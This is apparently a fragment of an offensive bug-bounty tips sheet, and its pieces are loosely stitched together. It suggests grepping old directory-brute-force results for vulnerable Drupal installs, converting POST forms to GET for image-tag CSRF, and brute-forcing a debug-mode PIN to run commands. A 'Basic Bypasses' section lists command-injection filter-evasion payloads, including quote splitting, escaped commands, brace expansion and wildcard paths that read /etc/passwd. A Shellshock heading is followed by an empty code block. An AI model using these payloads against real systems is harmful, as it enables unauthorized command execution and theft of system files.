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**Tip #6**
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Keep all your directory brute force results so when a CVE like Drupalgeddon2 comes out, you can look for previously found instances (cat dirsearch/reports/*/* | grep INSTALL.mysql.txt | grep 200 | less)/
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**Tip #7**
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When you have a form, always try to change the request method from POST to GET in order to improve the CVSS score.
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For example, demonstrating a CSRF can be exploited simply by using \[img\] tag is better than having to send a link to the victim.
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If the target is running their application in debug mode you might be able to run commands. If you are running the target locally, you can probably brute-force the debugger PIN. The debugger PIN is always in the following format: `***-***-***`.
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**Basic Bypasses**
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```
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i'''d
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i"""d
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```
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```
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\l\s -l\a\h
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```
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```
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cat /e?c/p?ss??
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cat /e??/??ss*
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```
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{ls,}
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{ls,-a}
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```
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**Shellshock Bug**
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```bash
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